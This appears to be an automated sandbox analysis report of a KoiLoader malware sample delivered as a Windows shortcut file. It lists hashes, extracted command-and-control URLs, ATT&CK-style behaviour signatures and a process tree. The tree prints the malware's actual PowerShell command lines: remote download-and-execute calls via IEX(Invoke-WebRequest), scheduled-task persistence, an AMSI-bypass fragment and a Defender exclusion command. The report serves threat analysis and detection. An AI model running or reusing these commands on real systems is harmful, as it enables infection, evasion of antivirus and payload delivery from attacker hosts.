Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
Resource
win10v2004-20241007-en
General
-
Target
d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
-
Size
3KB
-
MD5
a8adbb0f006cbb7a70d7c2dcb0e2cff6
-
SHA1
38f9fbf5a68943dc8f265191bb302722afed95d7
-
SHA256
d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
-
SHA512
97686340a9b30c0516f8f7ac76a19a6547a6e407588dca5ac042ac767af0c57560059457e8042ccb2d3a031637d5ebd2d299e14446c6e0768c5cae75c1ae45fb
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
koiloader
http://195.123.217.43/oversate.php
-
payload_url
https://www.italialife24.it/wp-content/uploads/2021/05
Signatures
-
Koiloader family
-
Detects KoiLoader payload 2 IoCs
resource yara_rule behavioral2/memory/2288-56-0x00000000077E0000-0x00000000077ED000-memory.dmp family_koi_loader behavioral2/memory/3096-134-0x00000000079C0000-0x00000000079CD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 9 IoCs
flow pid Process 8 4020 powershell.exe 38 740 powershell.exe 39 2288 powershell.exe 40 2288 powershell.exe 45 5016 powershell.exe 46 5016 powershell.exe 51 2244 powershell.exe 52 3096 powershell.exe 53 2288 powershell.exe -
pid Process 3096 powershell.exe 2288 powershell.exe 4020 powershell.exe 2428 powershell.exe 5016 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wscript.EXE -
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 740 powershell.exe 2244 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2180 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4020 powershell.exe 4020 powershell.exe 740 powershell.exe 740 powershell.exe 2288 powershell.exe 2288 powershell.exe 2428 powershell.exe 2428 powershell.exe 5016 powershell.exe 5016 powershell.exe 2244 powershell.exe 2244 powershell.exe 3096 powershell.exe 3096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4020 powershell.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 3120 wrote to memory of 4020 3120 cmd.exe 84 PID 3120 wrote to memory of 4020 3120 cmd.exe 84 PID 4020 wrote to memory of 2180 4020 powershell.exe 85 PID 4020 wrote to memory of 2180 4020 powershell.exe 85 PID 1244 wrote to memory of 740 1244 wscript.EXE 103 PID 1244 wrote to memory of 740 1244 wscript.EXE 103 PID 740 wrote to memory of 2020 740 powershell.exe 106 PID 740 wrote to memory of 2020 740 powershell.exe 106 PID 740 wrote to memory of 4472 740 powershell.exe 107 PID 740 wrote to memory of 4472 740 powershell.exe 107 PID 4472 wrote to memory of 2288 4472 wscript.exe 108 PID 4472 wrote to memory of 2288 4472 wscript.exe 108 PID 4472 wrote to memory of 2288 4472 wscript.exe 108 PID 4320 wrote to memory of 4536 4320 DllHost.exe 112 PID 4320 wrote to memory of 4536 4320 DllHost.exe 112 PID 4320 wrote to memory of 4536 4320 DllHost.exe 112 PID 4536 wrote to memory of 2428 4536 cmd.exe 114 PID 4536 wrote to memory of 2428 4536 cmd.exe 114 PID 4536 wrote to memory of 2428 4536 cmd.exe 114 PID 2288 wrote to memory of 4040 2288 powershell.exe 115 PID 2288 wrote to memory of 4040 2288 powershell.exe 115 PID 2288 wrote to memory of 4040 2288 powershell.exe 115 PID 4040 wrote to memory of 5016 4040 cmd.exe 117 PID 4040 wrote to memory of 5016 4040 cmd.exe 117 PID 4040 wrote to memory of 5016 4040 cmd.exe 117 PID 2692 wrote to memory of 2244 2692 wscript.EXE 120 PID 2692 wrote to memory of 2244 2692 wscript.EXE 120 PID 2244 wrote to memory of 2100 2244 powershell.exe 123 PID 2244 wrote to memory of 2100 2244 powershell.exe 123 PID 2244 wrote to memory of 1864 2244 powershell.exe 124 PID 2244 wrote to memory of 1864 2244 powershell.exe 124 PID 1864 wrote to memory of 3096 1864 wscript.exe 127 PID 1864 wrote to memory of 3096 1864 wscript.exe 127 PID 1864 wrote to memory of 3096 1864 wscript.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL83⤵
- Scheduled Task/Job: Scheduled Task
PID:2180
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GJTPLSHZOJFL.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\GJTPLSHZOJFL.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f3⤵PID:2020
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\GJTPLSHZOJFL.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z2QXMKBQ9BE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\GJTPLSHZOJFL.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\GJTPLSHZOJFL.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f3⤵PID:2100
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\GJTPLSHZOJFL.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z271C6TDHLC'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\ra4172161-d53d-48af-8f36-a00b057e74d4r.js"1⤵PID:2120
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD577197cbc355d9d6e9239dc8f1e9e0b30
SHA189a579026f05d4978f305712ec42a8a169695b46
SHA256ca3445b1c0046d2a27dfc6984d68ed73689920dd1921be4ed2aa60574174f42c
SHA5126d1dcec5b0751a7efda736e927e8c56168d48bec1d2b594f62424997e00f8b75bf04b700f80e275a01d2cffb83a79558ebee0927c970175732795d43200408da
-
Filesize
1KB
MD56e77d5788f8e8880e98af10e67b87c1d
SHA128aab1eea48c4d33268a163daa8c68632d66955c
SHA25637851915224b5873a4ebb39885e543f61707dd10ea76f472fbd01114ce15ed31
SHA512b2a852805dcd04c452441d53f7e98166dde62331ab47105cc9af21498e025e0c5db08ac489ede484e3923cb2a9a1a3b0c3ffbeae28d7d80493f3b1fb25e76a23
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
19KB
MD540ddb1f44a1493ebb5aabd0f57a089d0
SHA1b2c7fe3da49ca701c5d626de8821585ddb13f27d
SHA25679971e3092f0878926ba44c0a1fd8fda2beb6a08acb742d107ab4a54c37b4d02
SHA5127b34d184ea709b81ff0bc2977d640d88981de3725aa30462a66c05a1b9467724c7874422d6f65cdbe82fb0dcfde3dfa797270198b039c3354afedb7c3fd5cf6c
-
Filesize
1KB
MD5477031a32089e6d066092d640b526add
SHA15041602c7c71b4c6e40928039dcc07b6b32a67f2
SHA2560ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef
SHA51201388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e
-
Filesize
1KB
MD5e936ffde1732f536cc835ed3e6c83842
SHA105a7c09e599c32003ea21329932a032ace4f592c
SHA256da9997a3db22d4c3b7900392af3d4a88d09de0df6c4a75d89ea1b271edbb2552
SHA51235d49450a82c671843080c2ff2ff0d33aa5640234958b7e417a9c2f9e20e24b752a4793a99662253e7ad892dcd70904f6524d5e71c0d80333d7d01741c115870
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
304B
MD59747ea89ca02ca1829c6c94c89c118d1
SHA13e397de2aa738fdcc17ea3a0bee40df5e69c3229
SHA2565c0a7f17680adb26ea5d6f9b7e5bf507f839a40b468c857b69c02151f660e574
SHA51212dacfce38d547f34d2b33864ac50dd102973ad6b013015114695ae4c73b3a24b660779a26b7defce1dc5d1bccb3d3dcd386b6c5859facd8005b8ed9e5d1371b